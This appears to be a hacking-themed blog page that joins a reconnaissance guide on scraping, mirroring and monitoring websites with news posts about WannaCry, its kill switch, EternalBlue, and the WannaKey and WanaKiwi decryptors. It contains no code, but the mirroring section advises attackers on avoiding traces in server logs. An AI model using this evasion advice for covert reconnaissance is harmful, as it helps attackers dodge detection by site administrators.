Data displayed by most websites can only be viewed using a web browser. They do not offer the functionality to save a copy of this data for personal use. The only option then is to manually copy and paste the data - a very tedious job which can take many hours or sometimes days to complete. Web Scraping is the technique of automating this process, so that instead of manually copying the data from websites, the Web Scraping software will perform the same task within a fraction of the time.

A web scraping software will automatically load and extract data from multiple pages of websites based on your requirement. It is either custom built for a specific website or is one which can be configured to work with any website. With the click of a button you can easily save the data available in the website to a file in your computer.

One of the useful Web Scraping Software is listed below: 

• Web Data Extractor - http://www.webextractor.com/ 

You can also use any other software/plugin/script for the same job. These are easily available on internet. The main concern is that, the tool must be easy to use.

Website Mirroring

Mirroring refers to downloading the entire website offline on your harddisk for browsing it offline.

Mirroring an entire website onto local machine enables an attacker to browse website offline; it can also assist in finding directory structure and other valuable information from mirrored copy without multiple requests to web server. Sending multiple requests to a web server may be dangerous as the admin when looking to log files, can identify that you were trying to collect sensitive information from the site and it can help the admin to traceback you.

Some well-known web mirroring tools are:

• HTTrack - http://www.httrack.com/
• Surf Offline - http://www.surfoffline.com/ 

There are many other tools which are easily available on Google but these are the best.

Website Monitoring

Monitoring a website refers to getting information such as:

• How frequently the admin posts on the site?
• Which posts are deleted?
• When was an article posted?
• Get alerted when a new article is posted on the site.

There are two methods used for different purposes. The first three purpose listed above are satisfied by Internet Archives. You can refer to its complete guide in this article.

The second method is easy to use and satisfies the fourth (last) purpose of website monitoring. It works the same way when you subscribe to a website. When a new post is posted, you are informed about it through mail service. But the major difference is that, in subscription, the alert mail is controlled by the admin i.e. we are alerted of the new article when the admin wants; while in monitoring, we are the controller. That is, we check regularly if a site has posted a new article or has made any changes.

But doing this task manually is tiresome as said before. So automated tools and services are used with a view to reduce the work. Some of the tools used for this purpose are:

• Website Watcher - http://aignes.com/
• Change Detection - https://www.changedetection.com/
• Follow that Page - https://followthatpage.com
• Watch that Page - http://watchthatpage.com/

The above are some of the best services while you can search google for more such services if you want.

Read More

WannaCry Decryption Tool Released - Unlock Data Without Paying Ransom

You all might be knowing about WannaCry – the ransomware that spread across the world last Friday. This is the malware that took down PCs from all over the world and encrypted the data on all these PCs, asking people to pay ransom in order to get their data back.

To know more about this ransomware, click here..
To know about how to prevent yourself from this ransomware, click here..

If your PC has been infected by WannaCry, you might be lucky to get your locked files back without paying the ransom of $300 to the cyber criminals.

Adrien Guinet, a French security researcher from Quarkslab, has discovered a way to retrieve the secret encryption keys used by the WannaCry ransomware for free, which works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems. That means it would work on all the versions of windows from XP to 7.

Introduction

Yesterday, Adrien Guinet published a tool called wannakey to perform RSA key recovery on Windows XP. His tool is very ingenious as it does not look for the actual key but the prime numbers in memory to recompute the key itself. In short, his technique is totally bad ass and super smart.

Although, some file format issue happened with the exported key that didn’t make it compatible with other tools such as wanadecrypt from Benjamin Delpy (@gentilkiwi) on Windows XP, as the Windows Crypt APIs on Windows XP are expecting a very strict input to work unlike Windows 10.

This method relies on finding prime numbers in memory if the memory hasn’t be reused — this means that after a certain period of time memory may get reused and those prime numbers may be erased. Also, this means the infected machine should not have been rebooted.

After reading all the above paragraphs, you might still be wondering - What is this..! So, let me make you understand this using how this tool works. It would be easier for to understand.

How the WannaCry Decryptor works?

First of all, to understand how to decrypt a file, one should know how the file was encrypted... The same was done by security expert "Guinet".

The WannaCry's encryption scheme works by generating a pair of keys on the victim's computer that rely on prime numbers, a "public" key and a "private" key for encrypting and decrypting the system’s files respectively.

To prevent the victim from accessing the private key and decrypting locked files himself, WannaCry erases the key from the system, leaving no choice for the victims to retrieve the decryption key except paying the ransom to the attacker.

Click to view full size image

The above image contains the source code of the file which starts the encryption process inside a system.

But here's the kick: WannaCry "does not erase the prime numbers from memory before freeing the associated memory," says Guinet.

Based on this finding, Guinet released a WannaCry ransomware decryption tool, named WannaKey, that basically tries to retrieve the two prime numbers, used in the formula to generate encryption keys from memory.

"It does so by searching for them in the wcry.exe process. This is the process that generates the RSA private key. The main issue is that the CryptDestroyKey and CryptReleaseContext does not erase the prime numbers from memory before freeing the associated memory." says Guinet

Hence, the basic idea of this tool is to fetch the prime numbers -which were used to form the private key- from the memory space. Hence, this would only be possible if the numbers in memory are not lost.

So, that means, this method will work only if:

• The affected computer has not been rebooted after being infected.
• The associated memory has not been allocated and erased by some other process.

"In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work , and so it might not work in every case!," Guinet says.

While WannaKey only pulls prime numbers from the memory of the affected computer, the tool can only be used by those who can use those prime numbers to generate the decryption key manually to decrypt their WannaCry-infected PC’s files.

This would not be possible for everyone to undertake a manual process and use an algorithm to make a decryption key with the help of prime numbers fetched. Hence, with a view to this, another security researcher, Benjamin Delpy, developed an easy-to-use tool called "WanaKiwi," based on Guinet's finding, which simplifies the whole process of the WannaCry-infected file decryption.

All victims have to do is download WanaKiwi tool from Github and run it on their affected Windows computer using the command line (cmd).

Steps to follow:

1. Download wanakiwi here
2. wanakiwi.exe needs to be in the same folder as your .pky file when you launch it
3. Have luck so that your prime numbers haven’t been overwritten from the process address space.

WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008, confirmed Matt Suiche from security firm Comae Technologies, who has also provided some demonstrations showing how to use WanaKiwi to decrypt your files.

Although the tool won't work for every user due to its dependencies, still it gives some hope to WannaCry's victims of getting their locked files back for free from largely unsupported version of Microsoft's operating system. 

Read More

WannaCry 2.0 - It's not over yet..!

If you are following our news articles, by now you might be aware that a security researcher has activated a "Kill Switch" which apparently stopped the WannaCry ransomware from spreading further. But it's not true, neither the threat is over yet. However, the kill switch has just slowed down the infection rate.

So far, over 237,000 computers across 99 countries around the world have been infected, and the infection is still rising every hour. Even after the kill switch got triggered by the 22-years-old British security researcher who handles  'MalwareTech.', the spread of this malware is not stopable.

Introduction:

For those unaware, WannaCry is an insanely fast-spreading ransomware malware that leverages a Windows SMB exploit to remotely target a computer running on unpatched or unsupported versions of Windows.

 

Once infected, WannaCry also scans for other vulnerable computers connected to the same network, as well scans random hosts on the wider Internet, to spread quickly.

The SMB exploit, currently being used by WannaCry, has been identified as EternalBlue, a collection of hacking tools allegedly created by the NSA and then subsequently dumped by a hacking group calling itself "The Shadow Brokers" over a month ago.

Kill-Switch for WannaCry... But it's not over yet..! 

In my previous two articles (link for first, link for second), I had put together most of the information about this massive ransomware campaign, explaining how MalwareTech accidentally halted the global spread of WannaCry by registering a domain name hidden in the malware.

hxxp://www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

The above-mentioned domain is responsible for keeping WannaCry propagating and spreading like a worm, as I previously explained that if the connection to this domain fails, the SMB worm proceeds to infect the system.

Fortunately, MalwareTech registered this domain in question and created a sinkhole – tactic researchers use to redirect traffic from the infected machines to a self-controlled system. (read his latest blog post for more details.)

So after all this, you would just be thinking that What's new in it..! So let me tell you what really happened next.

Matthieu Suiche, a security researcher, has confirmed that he has found a new WannaCry variant with a different domain for kill-switch function, which he registered to redirect it to a sinkhole in an effort to slows down the infections.

The newly discovered WannaCry variant works exactly like the previous variant that spread fright across the world Friday night. But, if you are thinking that activating the kill switch has completely stopped the infection, then you are mistaken. So why does the malware still spread after triggering the kill switch..!

Why triggering the Kill-Switch does not stop this malware?

To get answer to this question, you should first know about what the Kill Switch really did?  The kill-switch feature was in the SMB worm and not the ransomware module. Hence, triggering the kill switch, stopped the spreading of malware using the Windows SMB vulnerability. But the malware could still spread through emails and other modes.

Hence, triggering the switch just slowed down the malware but did not stop it successfully.

Since the kill-switch feature was in the SMB worm, not in the ransomware module itself., "WannaCrypt ransomware was spread normally long before this and will be long after, what we stopped was the SMB worm variant," said MalwareTech

You should know that the kill-switch would not prevent your unpatched PC from getting infected, in the following scenarios:

• If you receive WannaCry via an email, a malicious torrent, or other vectors (instead of SMB protocol).
• If by chance your ISP or antivirus or firewall blocks access to the sinkhole domain.
• If the targeted system requires a proxy to access the Internet, which is a common practice in the majority of corporate networks.
• If someone makes the sinkhole domain inaccessible for all, such as by using a large-scale DDoS attack.

MalwareTech also confirmed that "Mirai botnet skids tried to DDoS the [sinkhole] server for lulz," in order to make it unavailable for WannaCry SMB exploit, which triggers infection if the connection fails. But "it failed hardcore," at least for now.

In short, we just need to know that if the sinkhole server becomes inaccessible, then none can stop the power of WannaCry. Though one can be safe using the prevention measures mentioned in this article.

WannaCry 2.0 - The Ransomware with no kill-switch

Costin Raiu, the director of global research and analysis team at Kaspersky Labs, confirmed that his team had seen more WannaCry samples on Friday that did not have the kill switch.

Raiu from Kaspersky shared some samples, his team discovered, with Suiche, who analysed them and just confirmed that there is a WannaCrypt variant without kill switch, and equipped with SMB exploit that would help it to spread rapidly without disruption.

What's even worse is that the new WannaCry variant without a kill-switch believed to be created by someone else, and not the hackers behind the initial WannaCry ransomware. Hence, this work is now proved interesting to other hackers as well. And the threat would be rising as number of hackers start working to modify the code of this ransomware.

According to the news, this patched version was modified by someone else to disable the kill-switch. This task was done using a hex-editor. However, Suiche also confirmed that the modified variant with no kill switch is corrupted, but this doesn't mean that other hackers and criminals would not come up with a working one.

Even after WannaCry attacks made headlines all over the Internet and Media, there are still hundreds of thousands of unpatched systems out there that are open to the Internet and vulnerable to hacking.

"The worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in large SMB traffic from the infected host," Microsoft says.

WannaCry's Success Rate..!

Speaking to Britain's ITV, Europol chief Rob Wainwright said the whole world is facing an "escalating threat," warning people that the numbers are going up and that they should ensure the security of their systems is up to date.

"We are running around 200 global operations against cyber crime each year, but we've never seen anything like this," Wainwright said, as quoted by BBC. 

"The latest count is over 200,000 victims in at least 150 countries. Many of those victims will be businesses, including large corporations. The global reach is unprecedented.

Still this malware is spreading all over the internet and taking down computers. Stay safe and protect yourself else you know the consequences. Just take time to read the steps to prevent yourself from WannaCry Ransomware. Stay connected for more updates..

To join the discussion, you can connect with us by joining:
Facebook Group - https://www.facebook.com/groups/libraryofhacks/
Google+ Community - https://plus.google.com/u/0/communities/108097537597083648039

Read More